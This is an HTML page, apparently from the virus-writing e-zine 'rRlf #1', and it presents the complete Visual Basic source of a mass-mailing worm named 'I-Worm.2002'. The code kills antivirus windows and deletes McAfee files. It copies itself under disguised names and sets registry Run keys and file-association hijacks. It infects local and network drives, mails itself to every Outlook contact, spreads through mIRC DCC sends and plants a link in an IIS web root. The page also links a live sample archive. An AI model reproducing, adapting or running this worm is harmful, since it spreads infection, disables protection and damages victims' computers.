<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="18.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="20.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - I-worm.2002 by Alco paul</u></b>
<p>A vb-worm. Collects all addresses in the address-book, and sends e-mails in 1:1 ratios.
<br>Here goes the script:
<p>Option Explicit
<br>Private Declare Function SystemParametersInfo Lib _
<br>"user32" Alias "SystemParametersInfoA" (ByVal uAction _
<br>As Long, ByVal uParam As Long, ByVal lpvParam As Any, _
<br>ByVal fuWinIni As Long) As Long
<br>Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
<br>&nbsp;Private Declare Function FindWindow Lib "user32" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Alias "FindWindowA" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ByVal lpClassName As String, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal lpWindowName As String) As Long
<p>&nbsp;&nbsp;&nbsp;&nbsp;Private Declare Function PostMessage Lib "user32" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Alias "PostMessageA" _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(ByVal hwnd As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal wMsg As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal wParam As Long, _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ByVal lParam As Long) As Long
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Const WM_CLOSE = &H10
<br>Sub Main()
<br>Call TurnOff
<br>Call Birth
<br>Call Reg
<br>Call ntwrk
<br>Call Worming
<br>Call irc
<br>Call iis
<br>Call payload
<br>Call js
<br>End Sub
<br>Function TurnOff()
<br>On Error Resume Next
<br>Dim hWindow As Long
<br>Dim lngReturnValue As Long
<br>Dim aWindow As Long
<br>Dim angReturnValue As Long
<br>Dim bWindow As Long
<br>Dim bngReturnValue As Long
<br>Dim eWindow As Long
<br>Dim engReturnValue As Long
<br>Dim cWindow As Long
<br>Dim cngReturnValue As Long
<br>Dim dWindow As Long
<br>Dim dngReturnValue As Long
<br>Dim xtasy As Long
<br>cWindow = FindWindow(vbNullString, "Dvp95")
<br>cngReturnValue = PostMessage(cWindow, WM_CLOSE, vbNull, vbNull)
<br>dWindow = FindWindow(vbNullString, "Iomon98")
<br>dngReturnValue = PostMessage(dWindow, WM_CLOSE, vbNull, vbNull)
<br>hWindow = FindWindow(vbNullString, "NAI_VS_STAT")
<br>lngReturnValue = PostMessage(hWindow, WM_CLOSE, vbNull, vbNull)
<br>aWindow = FindWindow(vbNullString, "AVP Monitor")
<br>angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull)
<br>bWindow = FindWindow(vbNullString, "vettray")
<br>bngReturnValue = PostMessage(bWindow, WM_CLOSE, vbNull, vbNull)
<br>eWindow = FindWindow(vbNullString, "F-STOPW Version 5.06c")
<br>engReturnValue = PostMessage(eWindow, WM_CLOSE, vbNull, vbNull)
<br>xtasy = SystemParametersInfo(97, True, CStr(1), 0)
<br>Kill "c:\progra~1\mcafee\mcafee~1\default.vsc"
<br>Kill "c:\progra~1\mcafee\mcafee~1\default.vsh"
<br>Kill "c:\progra~1\mcafee\mcafee~1\vshwin32.exe"
<br>End Function
<br>Function Birth()
<br>On Error Resume Next
<br>Dim xx, xy, babybrother, babysister, babybrosis, babysisbro, baby, dad, mom, scanreg, regedit, regedit1, cmmand, formt, dskcopy, attach, ping1, help, iisfile, nt
<br>xx = App.Path & "\" & App.EXEName & ".EXE"
<br>xy = App.Path & App.EXEName & ".EXE"
<br>dad = App.Path & "\" & App.EXEName & ".COM"
<br>mom = App.Path & App.EXEName & ".COM"
<br>babybrother = "c:\Windows\Favorites\pacman.com"
<br>babysister = "c:\Recycled\cd12.com"
<br>babysisbro = "c:\Recycled\dos\restore.com"
<br>babybrosis = "c:\Windows\startm~1\programs\startup\win32.com"
<br>baby = "c:\WINDOWS\boot32.dat"
<br>scanreg = "c:\WINDOWS\scanregw.exe"
<br>regedit = "c:\WINDOWS\regedit.exe"
<br>regedit1 = "c:\WINDOWS\OPTIONS\CABS\regedit.exe"
<br>cmmand = "c:\WINDOWS\ping.exe"
<br>formt = "c:\WINDOWS\marley.mp3"
<br>dskcopy = "c:\WINDOWS\vshwin32.com"
<br>attach = "c:\WINDOWS\SYSTEM\2002.com"
<br>help = "c:\WINDOWS\Help.com"
<br>ping1 = "c:\WINDOWS\telnet.exe"
<br>iisfile = "C:\INETPUB\WWWROOT\INTERNET.EXE"
<br>nt = "c:\WinNT\pacman.com"
<br>FileCopy xx, babybrother
<br>FileCopy xy, babybrother
<br>FileCopy xx, babysister
<br>FileCopy xy, babysister
<br>FileCopy xx, babybrosis
<br>FileCopy xy, babybrosis
<br>Shell "command.com /c md c:\recycled\dos", vbHide
<br>FileCopy xx, babysisbro
<br>FileCopy xy, babysisbro
<br>FileCopy xx, baby
<br>FileCopy xy, baby
<br>FileCopy xx, scanreg
<br>FileCopy xy, scanreg
<br>FileCopy xx, regedit
<br>FileCopy xy, regedit
<br>FileCopy xx, regedit1
<br>FileCopy xy, regedit1
<br>FileCopy xx, cmmand
<br>FileCopy xy, cmmand
<br>FileCopy xx, formt
<br>FileCopy xy, formt
<br>FileCopy xx, dskcopy
<br>FileCopy xy, dskcopy
<br>FileCopy xx, attach
<br>FileCopy xy, attach
<br>FileCopy xx, ping1
<br>FileCopy xy, ping1
<br>FileCopy xx, help
<br>FileCopy xy, help
<br>FileCopy xx, iisfile
<br>FileCopy xy, iisfile
<br>FileCopy xx, nt
<br>FileCopy xy, nt
<br>FileCopy dad, babybrother
<br>FileCopy mom, babybrother
<br>FileCopy dad, babysister
<br>FileCopy mom, babysister
<br>FileCopy dad, babybrosis
<br>FileCopy mom, babybrosis
<br>FileCopy dad, babysisbro
<br>FileCopy mom, babysisbro
<br>FileCopy dad, baby
<br>FileCopy mom, baby
<br>FileCopy dad, scanreg
<br>FileCopy mom, scanreg
<br>FileCopy mom, regedit
<br>FileCopy dad, regedit
<br>FileCopy mom, regedit1
<br>FileCopy dad, regedit1
<br>FileCopy mom, cmmand
<br>FileCopy dad, cmmand
<br>FileCopy mom, formt
<br>FileCopy dad, formt
<br>FileCopy mom, dskcopy
<br>FileCopy dad, dskcopy
<br>FileCopy mom, attach
<br>FileCopy dad, attach
<br>FileCopy mom, ping1
<br>FileCopy dad, ping1
<br>FileCopy mom, help
<br>FileCopy dad, help
<br>FileCopy mom, iisfile
<br>FileCopy dad, iisfile
<br>FileCopy mom, nt
<br>FileCopy dad, nt
<br>End Function
<br>Function Reg()
<br>On Error Resume Next
<br>Dim g
<br>Set g = CreateObject("WScript.Shell")
<br>g.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\*Ping", "c:\WINDOWS\ping.exe"
<br>g.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*Regedit", "c:\WINDOWS\regedit.exe"
<br>g.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*Spawn", "command.com /c copy /y c:\WINDOWS\boot32.dat c:\WINDOWS\SYSTEM\system.com"
<br>g.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\V32COM", "c:\WINDOWS\vshwin32.com"
<br>g.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\INTERNET", "C:\INETPUB\WWWROOT\INTERNET.EXE"
<br>g.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*Help", "c:\WINDOWS\Help.com"
<br>g.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce\*System", "c:\WINDOWS\SYSTEM\system.com"
<br>g.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce\*Telnet", "c:\WINDOWS\telnet.exe"
<br>g.regwrite "HKEY_CLASSES_ROOT\comfile\", "JPEG Image"
<br>g.regwrite "HKEY_CLASSES_ROOT\comfile\DefaultIcon\", "shimgvw.dll,3"
<br>g.regwrite "HKEY_CLASSES_ROOT\exefile\", "Ei Slagehammer, I hate exe files.. - Alcopaul"
<br>g.regwrite "HKEY_CLASSES_ROOT\jpegfile\", "Hi, Janis Ruckenbrod.. Search my nude picture in your pc.. - Alcopaul"
<br>g.regwrite "HKEY_CLASSES_ROOT\mp3file\", "Download only punk, ska and reggae mp3s.. - Alcopaul"
<br>g.regwrite "HKEY_CLASSES_ROOT\htmlfile\shell\opennew\command\", "c:\WINDOWS\telnet.exe"
<br>g.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", "c:\Recycled\dos\restore.com"
<br>g.regwrite "HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command\", "c:\WINDOWS\Wscript.exe c:\Windows\banner.js"
<br>g.regwrite "HKEY_CLASSES_ROOT\VBSFile\Shell\Open2\Command\", "c:\WINDOWS\Cscript.exe c:\Windows\banner.js"
<br>g.regwrite "HKEY_CLASSES_ROOT\MPEGFILE\shell\open\command\", "c:\Recycled\cd12.com"
<br>End Function
<br>Sub infect(drive)
<br>On Error Resume Next
<br>Dim s, f
<br>Set s = CreateObject("Scripting.FileSystemObject")
<br>Set f = s.GetFile("c:\WINDOWS\marley.mp3")
<br>f.Copy (drive & "\pussy.com")
<br>f.Copy (drive & "\windows\startm~1\programs\startup\msdos.com")
<br>End Sub
<br>Function ShowDriveType(drvpath)
<br>On Error Resume Next
<br>Dim fso, d, t
<br>Set fso = CreateObject("Scripting.FileSystemObject")
<br>Set d = fso.GetDrive(drvpath)
<br>Select Case d.DriveType
<br>Case 0: t = "Unknown"
<br>Case 1: t = "Removable"
<br>Case 2: t = "Fixed"
<br>Case 3: t = "Network"
<br>Case 4: t = "CD-ROM"
<br>Case 5: t = "RAM Disk"
<br>End Select
<br>If t = "" Then t = "None"
<br>ShowDriveType = t
<br>End Function
<br>Sub ntwrk()
<br>On Error Resume Next
<br>Dim n, l, d3, drv
<br>For n = 65 To 90
<br>l = Chr(n)
<br>drv = l & ":"
<br>d3 = ShowDriveType(drv)
<br>If d3 = "Fixed" Then infect (drv)
<br>If d3 = "Network" Then infect (drv)
<br>Next n
<br>End Sub
<br>Function Worming()
<br>On Error Resume Next
<br>Dim a, b, f, d, g
<br>Set a = CreateObject("Outlook.Application")
<br>Set b = a.getnamespace("MAPI")
<br>If a = "Outlook" Then
<br>b.Logon "profile", "password"
<br>For f = 1 To b.addresslists.Count
<br>For d = 1 To b.addresslists(f).addressentries.Count
<br>With a.createitem(69 - 69)
<br>Set g = b.addresslists(f).addressentries(d)
<br>.Recipients.Add g
<br>.Subject = "Predictions for 2002"
<br>.body = "Know what will happen this 2002, the year of the horse.. Discover your fortune and destiny.. Only from 2002.com"
<br>.Attachments.Add "c:\WINDOWS\SYSTEM\2002.com"
<br>.send
<br>End With
<br>g = ""
<br>Next d
<br>Next f
<br>b.logoff
<br>End If
<br>End Function
<br>Function payload()
<br>On Error Resume Next
<br>If Day(Now()) = 21 Then
<br>MsgBox "Alcopaul.. Not Alcaul.. Asshole!!!", vbCritical, "I-Worm.2002...the dot COM worm"
<br>End If
<br>If Day(Now()) = 3 Then
<br>MsgBox "Day 3.... Do you know it's 3?", vbInformation, "I-Worm.2002...the dot COM worm"
<br>End If
<br>If Day(Now()) = 8 Then
<br>MsgBox "To infinity and beyond", vbExclamation, "I-Worm.2002...the dot COM worm"
<br>End If
<br>If Day(Now()) = 2 Then
<br>MsgBox "My favourite number.. I was always number two", vbInformation, "I-Worm.2002...the dot COM worm"
<br>End If
<br>If Month(Now()) = 2 Then
<br>mciSendString "Set CDAudio Door Open Wait", _
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0&, 0&, 0&
<br>End If
<br>End Function
<br>Function irc()
<br>On Error Resume Next
<br>If Dir("C:\mIRC", vbDirectory) <> "" Then
<br>Open "c:\mIRC\script.ini" For Output As 3
<br>Print #3, "[script]"
<br>Print #3, "n0= on 1:TEXT:*hello*:#:{"
<br>Print #3, "n1= /if ( $nick == $me ) { halt }"
<br>Print #3, "n2= /msg $nick Hello.. Let's play Pacman.. Just like the good old days.."
<br>Print #3, "n3= /dcc send -c $nick c:\Windows\Favorites\pacman.com"
<br>Print #3, "n4= }"
<br>Print #3, "n5= on 1:NICK:{"
<br>Print #3, "n6= /msg $newnick $newnick is better than your previous lame handle, $nick .."
<br>Print #3, "n7= /if ( $newnick == $me ) { halt }"
<br>Print #3, "n8= /msg $newnick Hello... Let's play Pacman.. Just like the good old days.."
<br>Print #3, "n9= /dcc send -c $newnick c:\Windows\Favorites\pacman.com"
<br>Print #3, "n10= }"
<br>Print #3, "n11= on 1:PART:#:{"
<br>Print #3, "n12= /if ( $nick == $me ) { halt }"
<br>Print #3, "n13= /msg $nick Bye, bye.. For now, enjoy playing Pacman.."
<br>Print #3, "n14= /dcc send -c $nick c:\Windows\Favorites\pacman.com"
<br>Print #3, "n15= }"
<br>Close 3
<br>Open "c:\mIRC\urls.ini" For Output As 6
<br>Print #6, "[urls]"
<br>Print #6, "n0=1:mIRC HomepageURL:http://www.cannabismail.com"
<br>Print #6, "n1=2:mIRC Message BoardURL:http://www.sex.com"
<br>Close 6
<br>End If
<br>End Function
<br>Function js()
<br>On Error Resume Next
<br>If Dir("c:\WINDOWS\banner.js") <> "banner.js" Then
<br>Open "c:\WINDOWS\banner.js" For Output As 7
<br>Print #7, "var WSHShell = WScript.CreateObject(""WScript.Shell"");"
<br>Print #7, "var intDoIt;"
<br>Print #7, "intDoIt =  WSHShell.Popup(""Ooooops.. Can't open file.."", 0, ""Alcopaul says"");"
<br>Close 7
<br>MsgBox "Go to www.2002.com for more predictions...", vbInformation, "2002.COM"
<br>End If
<br>End Function
<br>Function iis()
<br>On Error Resume Next
<br>Open "C:\INETPUB\WWWROOT\DEFAULT.HTM" For Output As 4
<br>Print #4, "< HTML >"
<br>Print #4, "Hello User !!!"
<br>Print #4, "Click < A HREF=""file://C:\INETPUB\WWWROOT\INTERNET.EXE"" TARGET=""_top"""
<br>Print #4, "TITLE=""file://C:\INETPUB\WWWROOT\INTERNET.EXE"">here< /A > to start..."
<br>Print #4, "< /HTML >"
<br>Close 4
<br>End Function
<br>'quite easy ei..
<br>'i-worm.2002 by alcopaul
<p><a href="19.zip">living virus</a>
</body>
</html>
